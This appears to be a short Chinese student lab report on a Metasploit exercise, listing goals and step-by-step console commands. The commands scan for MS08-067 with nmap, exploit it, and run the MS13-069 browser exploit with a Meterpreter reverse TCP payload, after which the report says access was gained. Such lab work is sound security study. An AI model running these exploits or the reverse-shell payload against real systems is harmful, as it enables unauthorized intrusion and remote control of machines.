一、实践目标
1.一个主动攻击实践
ms08_067
2.一个针对浏览器的攻击
ms13-069
3.一个针对客户端的攻击
adobe (Adobe_toolbutton客户端漏洞成功)
4.成功应用任何一个辅助模块
auxiliary/server/browser_autopwn
二、实验内容
主动攻击
首先输入nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶机IP地址
查看靶机是否存在该漏洞
然后在攻击机Kali的命令行中输入msfconsole
进入控制台
输入use exploit/windows/smb/ms08_067_netapi
使用这个漏洞
之后输入show options
查看需要设置的参数
设置完靶机地址就可以完成
输入exploit
进行攻击
针对浏览器的攻击
首先search ms13
找到ms13-069
输入use exploit/windows/browser/ms13_069_caret
输入show options
查看需要设置的参数
设置参数:
srvhost 192.168.1.154
srvport 80
set payload windows/meterpreter/reverse_tcp
lhost 192.168.1.154
输入exploit
进行攻击
攻击成功获取权限